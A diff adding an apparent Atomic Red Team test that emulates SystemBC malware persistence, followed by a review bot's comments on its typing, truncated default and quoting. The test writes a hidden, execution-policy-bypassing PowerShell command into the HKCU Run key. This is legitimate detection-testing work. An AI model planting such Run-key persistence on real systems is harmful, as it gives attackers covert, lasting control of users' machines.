@@ -151,3 +151,27 @@ atomic_tests:
command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f
cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
name: command_prompt
- name: SystemBC Malware-as-a-Service Registry
description: |
This Atomic will create a registry key called socks5_powershell for persistance access
https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
supported_platforms:
- windows
input_arguments:
reg_key_value:
description: Thing to Run
type: Path
default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
reg_key_path:
description: Path to registry key to update
type: Path
default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
executor:
command: |
$RunKey = "#{reg_key_path}"
Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
cleanup_command: |
Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore
name: powershell
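Review bot: The `reg_key_value` argument in the new SystemBC test is declared `type: Path` but its default is a command line, and that command line is truncated — `powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File` names no script — so the Run-key value the test writes does not match what the description and the linked write-up imply, and a detection validated against this atomic would be tuned to an unrealistic string; either document that the trailing `-File` with no argument is intentional or say in the description what the value models. The description `Thing to Run` should also state what the argument is, e.g. `Command line stored as the socks5_powershell Run-key value`, and the type should be `string` (or whatever spelling the file's other input_arguments use — only the tail of the preceding test is visible in this hunk, so confirm). The cleanup passes `#{reg_key_path}` unquoted while the command quotes it; `Remove-ItemProperty -Path "#{reg_key_path}" -Name "socks5_powershell" -Force -ErrorAction Ignore` keeps the two consistent and survives a key path with spaces. In the description, `persistance` should read `persistence`.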